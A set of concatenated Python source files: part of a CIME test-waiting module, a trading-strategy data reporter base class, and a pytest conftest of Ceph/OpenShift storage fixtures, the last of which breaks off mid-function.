logging.warning("Test name '{}' was found in both '{}' and '{}'".format(test_name, test_path, prior_path))
else:
raise CIMEError("Test name '{}' was found in both '{}' and '{}' with different results".format(test_name, test_path, prior_path))
test_results[test_name] = (test_path, test_status)
completed_test_paths.append(test_path)
expect(set(test_paths) == set(completed_test_paths),
"Missing results for test paths: {}".format(set(test_paths) - set(completed_test_paths)))
return test_results
###############################################################################
def wait_for_tests(test_paths,
no_wait=False,
check_throughput=False,
check_memory=False,
ignore_namelists=False,
ignore_memleak=False,
cdash_build_name=None,
cdash_project=E3SM_MAIN_CDASH,
cdash_build_group=CDASH_DEFAULT_BUILD_GROUP,
timeout=None,
force_log_upload=False,
no_run=False):
###############################################################################
# Set up signal handling, we want to print results before the program
# is terminated
set_up_signal_handlers()
with Timeout(timeout, action=signal_handler):
test_results = wait_for_tests_impl(test_paths, no_wait, check_throughput, check_memory, ignore_namelists, ignore_memleak, no_run)
all_pass = True
for test_name, test_data in sorted(test_results.items()):
test_path, test_status = test_data
logging.info("Test '{}' finished with status '{}'".format(test_name, test_status))
logging.info(" Path: {}".format(test_path))
all_pass &= test_status == TEST_PASS_STATUS
if cdash_build_name:
create_cdash_xml(test_results, cdash_build_name, cdash_project, cdash_build_group, force_log_upload)
return all_pass
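###############################################################################
def _example_wait_for_tests_usage():
###############################################################################
    # Illustrative sketch (not part of the original module): a minimal driver
    # for wait_for_tests() above. The test paths are placeholders, and the
    # one-hour timeout is an arbitrary example value.
    test_paths = ["/scratch/tests/case1", "/scratch/tests/case2"]
    all_pass = wait_for_tests(test_paths, no_wait=False, timeout=3600)
    logging.info("All tests passed: %s", all_pass)
    return all_pass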
|
ExtToolDefs.py
|
import json
import time
from threading import Thread
def fileToJson(filename, encoding="utf-8"):
f = open(filename, 'r', encoding=encoding)
content = f.read()
f.close()
try:
return json.loads(content)
except:
return None
class BaseIndexWriter:
'''
Base indicator output tool
'''
def __init__(self):
return
def write_indicator(self, id:str, tag:str, time:int, data:dict):
'''
Write out indicator data\n
@id indicator ID\n
@tag data tag\n
@time indicator timestamp\n
@data data payload, a dict
'''
raise Exception("Basic writer cannot output index data to any media")
class BaseDataReporter:
'''
Data reporter
'''
TaskReportRTData = 1
TaskReportSettleData = 2
TaskReportInitData = 3
def __init__(self, id:str):
self.__inited__ = False
self.__id__ = id
return
def init(self):
self.__inited__ = True
self.__thrd_task__ = None
self.__tasks__ = list()
self.__stopped__ = False
# load the strategy markers
filename = "./generated/marker.json"
obj = fileToJson(filename)
if obj is not None:
self.stra_names = obj["marks"]
def rpt_portfolio_rt_data_impl(self, rtData):
raise Exception("this method has not been implemented")
def rpt_strategy_rt_data_impl(self, rtData):
raise Exception("this method has not been implemented")
def rpt_init_data_impl(self, initData):
raise Exception("this method has not been implemented")
def __do_report_rt_data__(self):
print("settle data reporter triggered")
# Step 1: report the portfolio data; read the portfolio file
filename = "./generated/portfolio/datas.json"
objPort = fileToJson(filename)
objPort["pid"] = self.__id__
# start submitting the portfolio data
self.rpt_portfolio_rt_data_impl(objPort)
# Step 2: report per-strategy data
for sname in self.stra_names:
filename = "./generated/stradata/" + sname + ".json"
objStra = fileToJson(filename)
objStra["pid"] = self.__id__
objStra["sid"] = sname
self.rpt_strategy_rt_data_impl(objStra)
def __task_loop__(self):
while not self.__stopped__:
if len(self.__tasks__) == 0:
time.sleep(1)
continue
else:
taskid = self.__tasks__.pop(0)
if taskid == self.TaskReportRTData:
self.__do_report_rt_data__()
elif taskid == self.TaskReportSettleData:
self.__do_report_settle_data__()
elif taskid == self.TaskReportInitData:
self.__do_report_init_data__()
def __start__(self):
if self.__thrd_task__ is None:
self.__thrd_task__ = Thread(target=self.__task_loop__, name="reportthread")
# self.__thrd_task__.setDaemon(True)
self.__thrd_task__.start()
print("report thread started")
def __do_report_init_data__(self):
objInitData = dict()
objInitData["pid"] = self.__id__
objInitData["strategies"] = self.stra_names
self.rpt_init_data_impl(objInitData)
def __do_report_settle_data__(self):
print("settle data reporter triggered")
def report_rt_data(self):
print("rt data reporter triggered")
self.__tasks__.append(self.TaskReportRTData)
if self.__thrd_task__ is None:
self.__start__()
def report_settle_data(self):
self.__tasks__.append(self.TaskReportSettleData)
if self.__thrd_task__ is None:
self.__start__()
def report_init_data(self):
self.__tasks__.append(self.TaskReportInitData)
if self.__thrd_task__ is None:
self.__start__()
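class _ExampleFileDataReporter(BaseDataReporter):
    '''
    Illustrative sketch (not part of the original module): a reporter that
    appends every payload to a local JSON-lines file instead of pushing it to
    a remote service. The default filename is a placeholder.
    '''
    def __init__(self, id:str, filename:str = "./generated/report.log"):
        super().__init__(id)
        self.__filename__ = filename
    def __append__(self, kind:str, payload:dict):
        # append one JSON object per line
        with open(self.__filename__, "a", encoding="utf-8") as f:
            f.write(json.dumps({"kind": kind, "data": payload}, ensure_ascii=False) + "\n")
    def rpt_portfolio_rt_data_impl(self, rtData):
        self.__append__("portfolio_rt", rtData)
    def rpt_strategy_rt_data_impl(self, rtData):
        self.__append__("strategy_rt", rtData)
    def rpt_init_data_impl(self, initData):
        self.__append__("init", initData)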
|
conftest.py
|
import logging
import os
import tempfile
import pytest
import threading
from datetime import datetime
import random
from math import floor
from ocs_ci.utility.utils import TimeoutSampler, get_rook_repo
from ocs_ci.ocs.exceptions import TimeoutExpiredError
from ocs_ci.utility.spreadsheet.spreadsheet_api import GoogleSpreadSheetAPI
from ocs_ci.utility import aws
from ocs_ci.framework import config
from ocs_ci.framework.pytest_customization.marks import (
deployment, destroy, ignore_leftovers
)
from ocs_ci.utility.environment_check import (
get_status_before_execution, get_status_after_execution
)
from ocs_ci.utility.utils import (
get_openshift_client, ocsci_log_path, get_testrun_name
)
from ocs_ci.deployment import factory as dep_factory
from tests import helpers
from ocs_ci.ocs import constants, ocp, defaults, node, platform_nodes
from ocs_ci.ocs.resources.ocs import OCS
from ocs_ci.ocs.resources.pvc import PVC
log = logging.getLogger(__name__)
class OCSLogFormatter(logging.Formatter):
def __init__(self):
fmt = (
"%(asctime)s - %(levelname)s - %(name)s.%(funcName)s.%(lineno)d "
"- %(message)s"
)
super(OCSLogFormatter, self).__init__(fmt)
def pytest_logger_config(logger_config):
logger_config.add_loggers([''], stdout_level='info')
logger_config.set_log_option_default('')
logger_config.split_by_outcome()
logger_config.set_formatter_class(OCSLogFormatter)
@pytest.fixture(scope='class')
def secret_factory_class(request):
return secret_factory_fixture(request)
@pytest.fixture(scope='function')
def secret_factory(request):
return secret_factory_fixture(request)
def secret_factory_fixture(request):
"""
Secret factory. Calling this fixture creates a new secret.
RBD based is default.
"""
instances = []
def factory(interface=constants.CEPHBLOCKPOOL):
"""
Args:
interface (str): CephBlockPool or CephFileSystem. This decides
whether a RBD based or CephFS resource is created.
RBD is default.
"""
secret_obj = helpers.create_secret(
interface_type=interface
)
assert secret_obj, "Failed to create a secret"
instances.append(secret_obj)
return secret_obj
def finalizer():
"""
Delete the secrets
"""
for instance in instances:
instance.delete()
instance.ocp.wait_for_delete(
instance.name
)
request.addfinalizer(finalizer)
return factory
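# Illustrative sketch (not part of the original module): how a test elsewhere
# would consume the secret_factory fixture above. The underscore prefix keeps
# pytest from collecting it; CEPHFILESYSTEM is simply the non-default option.
def _example_secret_factory_usage(secret_factory):
    rbd_secret = secret_factory()                                    # RBD secret (default)
    cephfs_secret = secret_factory(interface=constants.CEPHFILESYSTEM)
    return rbd_secret, cephfs_secret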
@pytest.fixture(scope='class')
def ceph_pool_factory_class(request):
return ceph_pool_factory_fixture(request)
@pytest.fixture(scope='function')
def ceph_pool_factory(request):
return ceph_pool_factory_fixture(request)
def ceph_pool_factory_fixture(request):
"""
Create a Ceph pool factory.
Calling this fixture creates a new Ceph pool instance.
"""
instances = []
def factory(interface=constants.CEPHBLOCKPOOL):
if interface == constants.CEPHBLOCKPOOL:
ceph_pool_obj = helpers.create_ceph_block_pool()
elif interface == constants.CEPHFILESYSTEM:
cfs = ocp.OCP(
kind=constants.CEPHFILESYSTEM,
namespace=defaults.ROOK_CLUSTER_NAMESPACE
).get(defaults.CEPHFILESYSTEM_NAME)
ceph_pool_obj = OCS(**cfs)
assert ceph_pool_obj, f"Failed to create {interface} pool"
if interface != constants.CEPHFILESYSTEM:
instances.append(ceph_pool_obj)
return ceph_pool_obj
def finalizer():
"""
Delete the Ceph block pool
"""
for instance in instances:
instance.delete()
instance.ocp.wait_for_delete(
instance.name
)
request.addfinalizer(finalizer)
return factory
@pytest.fixture(scope='class')
def storageclass_factory_class(
request,
ceph_pool_factory_class,
secret_factory_class
):
return storageclass_factory_fixture(
request,
ceph_pool_factory_class,
secret_factory_class
)
@pytest.fixture(scope='function')
def storageclass_factory(
request,
ceph_pool_factory,
secret_factory
):
return storageclass_factory_fixture(
request,
ceph_pool_factory,
secret_factory
)
def storageclass_factory_fixture(
request,
ceph_pool_factory,
secret_factory,
):
"""
Create a storage class factory. Default is RBD based.
Calling this fixture creates a new storage class instance.
"""
instances = []
def factory(
interface=constants.CEPHBLOCKPOOL,
secret=None,
custom_data=None,
sc_name=None,
reclaim_policy=constants.RECLAIM_POLICY_DELETE
):
"""
Args:
interface (str): CephBlockPool or CephFileSystem. This decides
whether a RBD based or CephFS resource is created.
RBD is default.
secret (object): An OCS instance for the secret.
custom_data (dict): If provided then storageclass object is created
by using these data. Parameters `block_pool` and `secret`
are not used, but references are set if provided.
sc_name (str): Name of the storage class
Returns:
object: helpers.create_storage_class instance with links to
block_pool and secret.
"""
if custom_data:
sc_obj = helpers.create_resource(**custom_data)
else:
secret = secret or secret_factory(interface=interface)
ceph_pool = ceph_pool_factory(interface)
if interface == constants.CEPHBLOCKPOOL:
interface_name = ceph_pool.name
elif interface == constants.CEPHFILESYSTEM:
interface_name = helpers.get_cephfs_data_pool_name()
sc_obj = helpers.create_storage_class(
interface_type=interface,
interface_name=interface_name,
secret_name=secret.name,
sc_name=sc_name,
reclaim_policy=reclaim_policy
)
assert sc_obj, f"Failed to create {interface} storage class"
sc_obj.ceph_pool = ceph_pool
sc_obj.secret = secret
instances.append(sc_obj)
return sc_obj
def finalizer():
"""
Delete the storage class
"""
for instance in instances:
instance.delete()
instance.ocp.wait_for_delete(
instance.name
)
request.addfinalizer(finalizer)
return factory
@pytest.fixture()
def project_factory_class(request):
return project_factory_fixture(request)
@pytest.fixture()
def project_factory(request):
return project_factory_fixture(request)
def project_factory_fixture(request):
"""
Create a new project factory.
Calling this fixture creates a new project.
"""
instances = []
def factory():
"""
Returns:
object: ocs_ci.ocs.resources.ocs instance of 'Project' kind.
"""
proj_obj = helpers.create_project()
instances.append(proj_obj)
return proj_obj
def finalizer():
"""
Delete the project
"""
for instance in instances:
ocp.switch_to_default_rook_cluster_project()
instance.delete(resource_name=instance.namespace)
instance.wait_for_delete(instance.namespace)
request.addfinalizer(finalizer)
return factory
@pytest.fixture(scope='class')
def pvc_factory_class(
request,
storageclass_factory_class,
project_factory_class
):
return pvc_factory_fixture(
request,
storageclass_factory_class,
project_factory_class
)
@pytest.fixture(scope='function')
def pvc_factory(
request,
storageclass_factory,
project_factory
):
return pvc_factory_fixture(
request,
storageclass_factory,
project_factory,
)
def pvc_factory_fixture(
request,
storageclass_factory,
project_factory
):
"""
Create a Persistent Volume Claim factory. Calling this fixture creates a new
PVC. For a custom PVC, provide the 'storageclass' parameter.
"""
instances = []
active_project = None
active_rbd_storageclass = None
active_cephfs_storageclass = None
def factory(
interface=constants.CEPHBLOCKPOOL,
project=None,
storageclass=None,
size=None,
access_mode=constants.ACCESS_MODE_RWO,
custom_data=None,
status=constants.STATUS_BOUND,
volume_mode=None
):
"""
Args:
interface (str): CephBlockPool or CephFileSystem. This decides
whether a RBD based or CephFS resource is created.
RBD is default.
project (object): ocs_ci.ocs.resources.ocs.OCS instance
of 'Project' kind.
storageclass (object): ocs_ci.ocs.resources.ocs.OCS instance
of 'StorageClass' kind.
size (int): The requested size for the PVC
access_mode (str): ReadWriteOnce, ReadOnlyMany or ReadWriteMany.
This decides the access mode to be used for the PVC.
ReadWriteOnce is default.
custom_data (dict): If provided then PVC object is created
by using these data. Parameters `project` and `storageclass`
are not used but reference is set if provided.
status (str): If provided then factory waits for object to reach
desired state.
volume_mode (str): Volume mode for PVC.
eg: volume_mode='Block' to create rbd `block` type volume
Returns:
object: helpers.create_pvc instance.
"""
if custom_data:
pvc_obj = PVC(**custom_data)
pvc_obj.create(do_reload=False)
else:
nonlocal active_project
nonlocal active_rbd_storageclass
nonlocal active_cephfs_storageclass
project = project or active_project or project_factory()
active_project = project
if interface == constants.CEPHBLOCKPOOL:
storageclass = (
storageclass or active_rbd_storageclass
or storageclass_factory(interface)
)
active_rbd_storageclass = storageclass
elif interface == constants.CEPHFILESYSTEM:
storageclass = (
storageclass or active_cephfs_storageclass
or storageclass_factory(interface)
)
active_cephfs_storageclass = storageclass
pvc_size = f"{size}Gi" if size else None
pvc_obj = helpers.create_pvc(
sc_name=storageclass.name,
namespace=project.namespace,
size=pvc_size,
do_reload=False,
access_mode=access_mode,
volume_mode=volume_mode
)
assert pvc_obj, "Failed to create PVC"
if status:
helpers.wait_for_resource_state(pvc_obj, status)
pvc_obj.storageclass = storageclass
pvc_obj.project = project
pvc_obj.access_mode = access_mode
instances.append(pvc_obj)
return pvc_obj
def finalizer():
"""
Delete the PVC
"""
pv_objs = []
# Get PV form PVC instances and delete PVCs
for instance in instances:
if not instance.is_deleted:
pv_objs.append(instance.backed_pv_obj)
instance.delete()
instance.ocp.wait_for_delete(
instance.name
)
# Wait for PVs to delete
for pv_obj in pv_objs:
pv_obj.ocp.wait_for_delete(
resource_name=pv_obj.name, timeout=180
)
request.addfinalizer(finalizer)
return factory
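# Illustrative sketch (not part of the original module): a test elsewhere
# would request pvc_factory and call it once per PVC. The 3Gi size and the
# 'ReadWriteMany' access mode (quoted from the docstring above) are
# placeholder choices.
def _example_pvc_factory_usage(pvc_factory):
    rbd_pvc = pvc_factory(size=3)
    cephfs_rwx_pvc = pvc_factory(
        interface=constants.CEPHFILESYSTEM,
        access_mode='ReadWriteMany',
        size=3
    )
    return rbd_pvc, cephfs_rwx_pvc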
@pytest.fixture(scope='class')
def pod_factory_class(request, pvc_factory_class):
return pod_factory_fixture(request, pvc_factory_class)
@pytest.fixture(scope='function')
def pod_factory(request, pvc_factory):
return pod_factory_fixture(request, pvc_factory)
def pod_factory_fixture(request, pvc_factory):
"""
Create a Pod factory. Calling this fixture creates a new Pod.
For custom Pods, provide the 'pvc' parameter.
"""
instances = []
def factory(
interface=constants.CEPHBLOCKPOOL,
pvc=None,
custom_data=None,
status=constants.STATUS_RUNNING,
pod_dict_path=None,
raw_block_pv=False
):
"""
Args:
interface (str): CephBlockPool or CephFileSystem. This decides
whether a RBD based or CephFS resource is created.
RBD is default.
pvc (PVC object): ocs_ci.ocs.resources.pvc.PVC instance kind.
custom_data (dict): If provided then Pod object is created
by using these data. Parameter `pvc` is not used but reference
is set if provided.
status (str): If provided then factory waits for object to reach
desired state.
pod_dict_path (str): YAML path for the pod.
raw_block_pv (bool): True for creating raw block pv based pod,
False otherwise.
Returns:
object: helpers.create_pod instance.
"""
if custom_data:
pod_obj = helpers.create_resource(**custom_data)
else:
pvc = pvc or pvc_factory(interface=interface)
pod_obj = helpers.create_pod(
pvc_name=pvc.name,
namespace=pvc.namespace,
interface_type=interface,
pod_dict_path=pod_dict_path,
raw_block_pv=raw_block_pv
)
assert pod_obj, "Failed to create Pod"
instances.append(pod_obj)
if status:
helpers.wait_for_resource_state(pod_obj, status)
pod_obj.reload()
pod_obj.pvc = pvc
return pod_obj
def finalizer():
"""
Delete the Pod
"""
for instance in instances:
instance.delete()
instance.ocp.wait_for_delete(
instance.name
)
request.addfinalizer(finalizer)
return factory
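# Illustrative sketch (not part of the original module): one pod backed by an
# implicitly created RBD PVC and one backed by an explicit CephFS PVC. The
# 3Gi size is a placeholder.
def _example_pod_factory_usage(pod_factory, pvc_factory):
    rbd_pod = pod_factory()                       # creates its own RBD PVC
    cephfs_pvc = pvc_factory(interface=constants.CEPHFILESYSTEM, size=3)
    cephfs_pod = pod_factory(interface=constants.CEPHFILESYSTEM, pvc=cephfs_pvc)
    return rbd_pod, cephfs_pod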
@pytest.fixture(scope='class')
def teardown_factory_class(request):
return teardown_factory_fixture(request)
@pytest.fixture(scope='function')
def teardown_factory(request):
return teardown_factory_fixture(request)
def teardown_factory_fixture(request):
"""
Tear down resources that were created during the test.
To use this factory, pass 'teardown_factory' to your test
function and call it in your test whenever a new resource is created and you
want it to be removed in the teardown phase:
def test_example(self, teardown_factory):
pvc_obj = create_pvc()
teardown_factory(pvc_obj)
"""
instances = []
def factory(resource_obj):
"""
Args:
resource_obj (OCS object or list of OCS objects) : Object to teardown after the test
"""
if isinstance(resource_obj, list):
instances.extend(resource_obj)
else:
instances.append(resource_obj)
def finalizer():
"""
Delete the resources created in the test
"""
for instance in instances[::-1]:
if not instance.is_deleted:
instance.delete()
instance.ocp.wait_for_delete(
instance.name
)
if instance.kind == constants.PVC:
if instance.reclaim_policy == constants.RECLAIM_POLICY_DELETE:
helpers.validate_pv_delete(instance.backed_pv)
request.addfinalizer(finalizer)
return factory
@pytest.fixture()
def service_account_factory(request):
"""
Create a service account
"""
instances = []
active_service_account_obj = None
def factory(
project=None, service_account=None
):
"""
Args:
project (object): ocs_ci.ocs.resources.ocs.OCS instance
of 'Project' kind.
service_account (str): service_account_name
Returns:
object: serviceaccount instance.
"""
nonlocal active_service_account_obj
if active_service_account_obj and not service_account:
return active_service_account_obj
elif service_account:
sa_obj = helpers.get_serviceaccount_obj(sa_name=service_account, namespace=project.namespace)
if not helpers.validate_scc_policy(sa_name=service_account, namespace=project.namespace):
helpers.add_scc_policy(sa_name=service_account, namespace=project.namespace)
sa_obj.project = project
active_service_account_obj = sa_obj
instances.append(sa_obj)
return sa_obj
else:
sa_obj = helpers.create_serviceaccount(
namespace=project.namespace,
)
sa_obj.project = project
active_service_account_obj = sa_obj
helpers.add_scc_policy(sa_name=sa_obj.name, namespace=project.namespace)
assert sa_obj, "Failed to create serviceaccount"
instances.append(sa_obj)
return sa_obj
def finalizer():
"""
Delete the service account
"""
for instance in instances:
helpers.remove_scc_policy(
sa_name=instance.name,
namespace=instance.namespace
)
instance.delete()
instance.ocp.wait_for_delete(resource_name=instance.name)
request.addfinalizer(finalizer)
return factory
@pytest.fixture()
def dc_pod_factory(
request,
service_account_factory,
pvc_factory,
):
"""
Create deploymentconfig pods
"""
instances = []
def factory(
interface=constants.CEPHBLOCKPOOL,
pvc=None,
service_account=None,
size=None,
custom_data=None,
replica_count=1,
):
"""
Args:
interface (str): CephBlockPool or CephFileSystem. This decides
whether a RBD based or CephFS resource is created.
RBD is default.
pvc (PVC object): ocs_ci.ocs.resources.pvc.PVC instance kind.
service_account (str): service account name for dc_pods
size (int): The requested size for the PVC
custom_data (dict): If provided then Pod object is created
by using these data. Parameter `pvc` is not used but reference
is set if provided.
replica_count (int): Replica count for deployment config
"""
if custom_data:
dc_pod_obj = helpers.create_resource(**custom_data)
else:
pvc = pvc or pvc_factory(interface=interface, size=size)
sa_obj = service_account_factory(project=pvc.project, service_account=service_account)
dc_pod_obj = helpers.create_pod(
interface_type=interface, pvc_name=pvc.name, do_reload=False,
namespace=pvc.namespace, sa_name=sa_obj.name, dc_deployment=True,
replica_count=replica_count
)
instances.append(dc_pod_obj)
log.info(dc_pod_obj.name)
helpers.wait_for_resource_state(
dc_pod_obj, constants.STATUS_RUNNING, timeout=180
)
return dc_pod_obj
def finalizer():
"""
Delete dc pods
"""
for instance in instances:
helpers.delete_deploymentconfig(instance)
request.addfinalizer(finalizer)
return factory
@pytest.fixture(scope="session", autouse=True)
def polarion_testsuite_properties(record_testsuite_property, pytestconfig):
"""
Configures polarion testsuite properties for junit xml
"""
polarion_project_id = config.REPORTING['polarion']['project_id']
record_testsuite_property('polarion-project-id', polarion_project_id)
jenkins_build_url = config.RUN.get('jenkins_build_url')
if jenkins_build_url:
record_testsuite_property(
'polarion-custom-description', jenkins_build_url
)
polarion_testrun_name = get_testrun_name()
record_testsuite_property(
'polarion-testrun-id', polarion_testrun_name
)
record_testsuite_property(
'polarion-testrun-status-id', 'inprogress'
)
record_testsuite_property(
'polarion-custom-isautomated', "True"
)
@pytest.fixture(scope="session", autouse=True)
def cluster(request, log_cli_level):
"""
This fixture initiates deployment for both OCP and OCS clusters.
Specific platform deployment classes will handle the fine details
of each action.
"""
log.info(f"All logs located at {ocsci_log_path()}")
teardown = config.RUN['cli_params']['teardown']
deploy = config.RUN['cli_params']['deploy']
factory = dep_factory.DeploymentFactory()
deployer = factory.get_deployment()
# Add a finalizer to teardown the cluster after test execution is finished
if teardown:
def cluster_teardown_finalizer():
deployer.destroy_cluster(log_cli_level)
request.addfinalizer(cluster_teardown_finalizer)
log.info("Will teardown cluster because --teardown was provided")
# Download client
force_download = (
config.RUN['cli_params'].get('deploy')
and config.DEPLOYMENT['force_download_client']
)
get_openshift_client(force_download=force_download)
if deploy:
# Deploy cluster
deployer.deploy_cluster(log_cli_level)
@pytest.fixture(scope='class')
def environment_checker(request):
node = request.node
# List of marks for which we will ignore the leftover checker
marks_to_ignore = [m.mark for m in [deployment, destroy, ignore_leftovers]]
for mark in node.iter_markers():
if mark in marks_to_ignore:
return
request.addfinalizer(get_status_after_execution)
get_status_before_execution()
@pytest.fixture(scope="session")
def log_cli_level(pytestconfig):
"""
Retrieves the log_cli_level set in pytest.ini
Returns:
str: log_cli_level set in pytest.ini or DEBUG if not set
"""
return pytestconfig.getini('log_cli_level') or 'DEBUG'
@pytest.fixture(scope="session")
def run_io_in_background(request):
"""
Run IO during the test execution
"""
if config.RUN['cli_params'].get('io_in_bg'):
log.info(f"Tests will be running while IO is in the background")
g_sheet = None
if config.RUN['google_api_secret']:
g_sheet = GoogleSpreadSheetAPI("IO BG results", 0)
else:
log.warning(
"Google API secret was not found. IO won't be reported to "
"a Google spreadsheet"
)
results = list()
temp_file = tempfile.NamedTemporaryFile(
mode='w+', prefix='test_status', delete=False
)
def get_test_status():
with open(temp_file.name, 'r') as t_file:
return t_file.readline()
def set_test_status(status):
with open(temp_file.name, 'w') as t_file:
t_file.writelines(status)
set_test_status('running')
def finalizer():
"""
Delete the resources created during setup, used for
running IO in the test background
"""
set_test_status('finished')
try:
for status in TimeoutSampler(90, 3, get_test_status):
if status == 'terminated':
break
except TimeoutExpiredError:
log.warning(
"Background IO was still in progress before IO "
"thread termination"
)
if thread:
thread.join()
log.info(f"Background IO has stopped")
for result in results:
log.info(f"IOPs after FIO for pod {pod_obj.name}:")
log.info(f"Read: {result[0]}")
log.info(f"Write: {result[1]}")
if pod_obj:
pod_obj.delete()
pod_obj.ocp.wait_for_delete(resource_name=pod_obj.name)
if pvc_obj:
pvc_obj.delete()
pvc_obj.ocp.wait_for_delete(resource_name=pvc_obj.name)
if sc_obj:
sc_obj.delete()
if cbp_obj:
cbp_obj.delete()
if secret_obj:
secret_obj.delete()
request.addfinalizer(finalizer)
secret_obj = helpers.create_secret(
interface_type=constants.CEPHBLOCKPOOL
)
cbp_obj = helpers.create_ceph_block_pool()
sc_obj = helpers.create_storage_class(
interface_type=constants.CEPHBLOCKPOOL,
interface_name=cbp_obj.name,
secret_name=secret_obj.name
)
pvc_obj = helpers.create_pvc(sc_name=sc_obj.name, size='2Gi')
helpers.wait_for_resource_state(pvc_obj, constants.STATUS_BOUND)
pvc_obj.reload()
pod_obj = helpers.create_pod(
interface_type=constants.CEPHBLOCKPOOL, pvc_name=pvc_obj.name
)
helpers.wait_for_resource_state(pod_obj, constants.STATUS_RUNNING)
pod_obj.reload()
def run_io_in_bg():
"""
Run IO by executing FIO and deleting the file created for FIO on
the pod, in a while true loop. Will be running as long as
the test is running.
"""
while get_test_status() == 'running':
pod_obj.run_io('fs', '1G')
result = pod_obj.get_fio_results()
reads = result.get('jobs')[0].get('read').get('iops')
writes = result.get('jobs')[0].get('write').get('iops')
if g_sheet:
now = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
g_sheet.insert_row([now, reads, writes])
results.append((reads, writes))
file_path = os.path.join(
pod_obj.get_storage_path(storage_type='fs'),
pod_obj.io_params['filename']
)
pod_obj.exec_cmd_on_pod(f'rm -rf {file_path}')
set_test_status('terminated')
log.info(f"Start running IO in the test background")
thread = threading.Thread(target=run_io_in_bg)
thread.start()
@pytest.fixture(
params=[
pytest.param({'interface': constants.CEPHBLOCKPOOL}),
pytest.param({'interface': constants.CEPHFILESYSTEM})
],
ids=["RBD", "CephFS"]
)
def interface_iterate(request):
"""
Iterate over interfaces - CephBlockPool and CephFileSystem
"""
return request.param['interface']
@pytest.fixture(scope='class')
def multi_pvc_factory_class(
storageclass_factory_class,
project_factory_class,
pvc_factory_class
):
return multi_pvc_factory_fixture(
storageclass_factory_class,
project_factory_class,
pvc_factory_class
)
@pytest.fixture(scope='function')
def multi_pvc_factory(storageclass_factory, project_factory, pvc_factory):
return multi_pvc_factory_fixture(
storageclass_factory,
project_factory,
pvc_factory
)
def multi_pvc_factory_fixture(
storageclass_factory,
project_factory,
pvc_factory
):
"""
Create a Persistent Volume Claims factory. Calling this fixture creates a
set of new PVCs. Options for PVC creation based on provided access modes:
1. For each PVC, choose random value from the list of access modes
2. Create PVCs based on the specified distribution number of access modes.
Create sets of PVCs based on the order of access modes.
3. Create PVCs based on the specified distribution number of access modes.
The order of PVC creation is independent of access mode.
"""
def factory(
interface=constants.CEPHBLOCKPOOL,
project=None,
storageclass=None,
size=None,
access_modes=None,
access_modes_selection='distribute_sequential',
access_mode_dist_ratio=None,
status=constants.STATUS_BOUND,
num_of_pvc=1,
wait_each=False
):
"""
Args:
interface (str): CephBlockPool or CephFileSystem. This decides
whether a RBD based or CephFS resource is created.
RBD is default.
project (object): ocs_ci.ocs.resources.ocs.OCS instance
of 'Project' kind.
storageclass (object): ocs_ci.ocs.resources.ocs.OCS instance
of 'StorageClass' kind.
size (int): The requested size for the PVC
access_modes (list): List of access modes. One of the access modes
will be chosen for creating each PVC. If not specified,
ReadWriteOnce will be selected for all PVCs. To specify
volume mode, append volume mode in the access mode name
separated by '-'.
eg: ['ReadWriteOnce', 'ReadOnlyMany', 'ReadWriteMany',
'ReadWriteMany-Block']
access_modes_selection (str): Decides how to select accessMode for
each PVC from the options given in the 'access_modes' list.
Values are 'select_random', 'distribute_random' and
'distribute_sequential'.
'select_random' : While creating each PVC, one access mode will
be selected at random from the 'access_modes' list.
'distribute_random' : The access modes in the list
'access_modes' will be distributed based on the values in
'access_mode_dist_ratio' and the order in which PVCs are created
will not be based on the access modes. For example, the 1st and
6th PVC might have the same access mode.
'distribute_sequential' : The access modes in the list
'access_modes' will be distributed based on the values in
'access_mode_dist_ratio' and the PVCs will be created as sets of
PVCs with the same access mode. For example, a first set of 10
will have the same access mode, followed by the next set of 13
with a different access mode.
access_mode_dist_ratio (list): Contains the number of PVCs to be
created for each access mode. If not specified, the given list
of access modes will be equally distributed among the PVCs.
eg: [10,12] for num_of_pvc=22 and
access_modes=['ReadWriteOnce', 'ReadWriteMany']
status (str): If provided then factory waits for object to reach
desired state.
num_of_pvc(int): Number of PVCs to be created
wait_each(bool): True to wait for each PVC to be in status 'status'
before creating next PVC, False otherwise
Returns:
list: objects of PVC class.
"""
pvc_list = []
if wait_each:
status_tmp = status
else:
status_tmp = ""
project = project or project_factory()
storageclass = storageclass or storageclass_factory(interface)
access_modes = access_modes or [constants.ACCESS_MODE_RWO]
access_modes_list = []
if access_modes_selection == 'select_random':
for _ in range(num_of_pvc):
mode = random.choice(access_modes)
access_modes_list.append(mode)
else:
if not access_mode_dist_ratio:
num_of_modes = len(access_modes)
dist_val = floor(num_of_pvc / num_of_modes)
access_mode_dist_ratio = [dist_val] * num_of_modes
access_mode_dist_ratio[-1] = (
dist_val + (num_of_pvc % num_of_modes)
)
zipped_share = list(zip(access_modes, access_mode_dist_ratio))
for mode, share in zipped_share:
access_modes_list.extend([mode] * share)
if access_modes_selection == 'distribute_random':
random.shuffle(access_modes_list)
for access_mode in access_modes_list:
if '-' in access_mode:
access_mode, volume_mode = access_mode.split('-')
else:
volume_mode = ''
pvc_obj = pvc_factory(
interface=interface,
project=project,
storageclass=storageclass,
size=size,
access_mode=access_mode,
status=status_tmp,
volume_mode=volume_mode
)
pvc_list.append(pvc_obj)
pvc_obj.project = project
if status and not wait_each:
for pvc_obj in pvc_list:
helpers.wait_for_resource_state(pvc_obj, status)
return pvc_list
return factory
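# A hedged usage sketch (not a collected test) for the factory above: request
# three PVCs with a sequential access-mode distribution of two ReadWriteOnce
# and one ReadWriteMany. It assumes constants.ACCESS_MODE_RWX is defined,
# like the ACCESS_MODE_RWO constant already used in this module.
def _example_multi_pvc_usage(multi_pvc_factory):
    return multi_pvc_factory(
        interface=constants.CEPHFILESYSTEM,
        size=3,
        access_modes=[constants.ACCESS_MODE_RWO, constants.ACCESS_MODE_RWX],
        access_modes_selection='distribute_sequential',
        access_mode_dist_ratio=[2, 1],
        num_of_pvc=3
    )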
@pytest.fixture(scope="session", autouse=True)
def rook_repo(request):
get_rook_repo(
config.RUN['rook_branch'], config.RUN.get('rook_to_checkout')
)
@pytest.fixture(scope="function")
def memory_leak_function(request):
"""
Fixture to start a memory leak capture thread that runs in parallel with the test run.
Memory leak data will be captured on all worker nodes for the ceph-osd process.
Data will be appended to the /tmp/(worker)-top-output.txt file for each worker.
The created tmp files will be deleted during teardown.
Usage:
test_case(.., memory_leak_function):
.....
median_dict = helpers.get_memory_leak_median_value()
.....
TC execution part, memory_leak_fun will capture data
....
helpers.memory_leak_analysis(median_dict)
....
"""
def finalizer():
"""
Finalizer to stop the memory leak data capture thread and clean up the files
"""
set_flag_status('terminated')
try:
for status in TimeoutSampler(90, 3, get_flag_status):
